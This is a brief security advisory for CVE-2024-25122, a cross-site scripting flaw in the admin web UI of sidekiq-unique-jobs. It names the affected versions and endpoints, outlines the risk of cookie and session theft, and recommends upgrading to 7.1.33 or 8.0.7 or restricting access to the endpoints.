CVE-2024-25122

Name of the Vulnerable Software and Affected Versions sidekiq-unique-jobs versions prior to 7.1.33 and 8.0.7

Description The issue is related to a Cross-Site Scripting (XSS) vulnerability in the sidekiq-unique-jobs "admin" web UI. Specially crafted GET request parameters handled by the following endpoints can allow a super-user attacker or an unwitting, authorized victim to execute malicious code, potentially stealing cookies, session data, or local storage data: "/changelogs", "/locks", or "/expiring locks". This vulnerability can impact many thousands of sites, as sidekiq-unique-jobs is widely deployed across the industry.

Recommendations To resolve the issue, upgrade to version 7.1.33 or 8.0.7. As a temporary workaround, consider restricting access to the vulnerable endpoints "/changelogs", "/locks", and "/expiring locks" until a patch is available. Additionally, configuring authorization constraints on the "admin" UI can help minimize the risk of exploitation.